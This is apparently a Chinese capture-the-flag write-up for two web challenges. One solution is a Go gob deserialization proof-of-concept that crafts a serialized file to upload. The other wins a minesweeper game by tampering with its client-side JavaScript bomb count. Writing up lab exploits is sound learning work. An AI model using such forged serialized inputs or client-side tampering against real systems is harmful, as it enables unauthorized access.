easy_go
data:image/s3,"s3://crabby-images/e1c8b/e1c8b86fb7f53b311a4b3c6f1da5c57630239e33" alt="1"
go反序列化,现学现卖,和python反序列化很像
html源码中有提示
data:image/s3,"s3://crabby-images/5ce21/5ce21d3a2518a111378ba15e408802309d559686" alt="image-20211011141352148"
poc-main.go
package main
import (
"encoding/gob"
"fmt"
"os"
)
type person struct {
Name string
}
func main(){
file, err := os.Create("./gob")
if err != nil {
fmt.Println(err)
}
user := person{Name: "You_Got_It"}
enc := gob.NewEncoder(file)
err2 := enc.Encode(user)
fmt.Println(err2)
}
运行后生成gob文件
data:image/s3,"s3://crabby-images/ffaca/ffaca482f95b66ed0fbe7d057c196c8c27f27d5b" alt="image-20211011141331745"
上传生成的文件,get flag
data:image/s3,"s3://crabby-images/952bc/952bc46585c14a6ef98af8c36fbfc8cdea2da46d" alt="image-20211011141405365"
Minesweepe
Minesweepe 题目内容:扫个雷吧,三个难度都通关了即可获得flag哦.靶机:183.129.189.60:10005 题目分值:100.0 题目难度:容易
看js文件,点击开始游戏,直接改炸弹数量,开挂玩
data:image/s3,"s3://crabby-images/d4bd8/d4bd8df5e8e71651d63f4cdbe3fa8509644d8ba9" alt="4"
data:image/s3,"s3://crabby-images/59503/59503e6322b5939a5ebbcf234ff60835386a570a" alt="2"
三个关卡分别是flag的三部分
链图片转存中…(img-OwuAGpbn-1633959534518)]
三个关卡分别是flag的三部分
只有两个web也只看了两个web,挺简单的,没什么难度
|